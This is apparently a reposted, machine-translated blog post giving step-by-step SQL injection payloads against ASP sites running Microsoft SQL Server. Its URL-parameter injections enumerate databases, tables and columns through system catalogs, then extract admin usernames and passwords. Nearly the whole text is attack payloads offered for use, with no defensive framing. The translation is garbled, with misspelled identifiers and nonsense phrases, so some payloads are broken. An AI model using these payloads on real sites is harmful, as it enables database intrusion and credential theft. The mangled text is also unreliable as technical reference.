"Ratio" in SQL injection

zhaozj2021-02-16  87

SQL INJECTION is flexible, the injected statement is different, and only the general steps of the branches are provided, I hope to help you.

1: Out of all library names. Http://www.**.com/***.asp? Id = 1 and 0 <> (select count (*) from master.dbo.sysdatabasees where name> 1 and NAME DBID = 6) Submit DBID = 7, 8, 9 .... Get more database name

2: There is a BBS database in the outburs library, submit the following statement: http://www.***.com/jump.asp? Id = 1 and 0 <> (SELECT TOP 1 Name from BBS .dbo.sysObjects where xtype = 'u') Come get a table to assume admin Submitted: http://www.***.com/jump.asp? id = 1 and 0 <> (SELECT TOP 1 Name from BBS .dbo.sysObjects where xtype = 'u' and name not in ('admin')) to get other tables.

3: Fields in the outbraction submission: http://www.***.com/***.asp? Id = 1 and 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'U' and name = 'admin' and uid> (STR (ID))) Get UID value assumption to 18779569 UID = ID Submit: http://www.***.com/***.asp? Id = 1 and 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of ADMIN, assume that the user_id 4: Froky Username, Password, etc. : Http://www.***.com/***.asp? Id = 1 and 0 <(Select user_id from bbs.dbo.admin where username> 1) You can get a password in order. . . . .

转载请注明原文地址:https://www.9cbs.com/read-12599.html

New Post(0)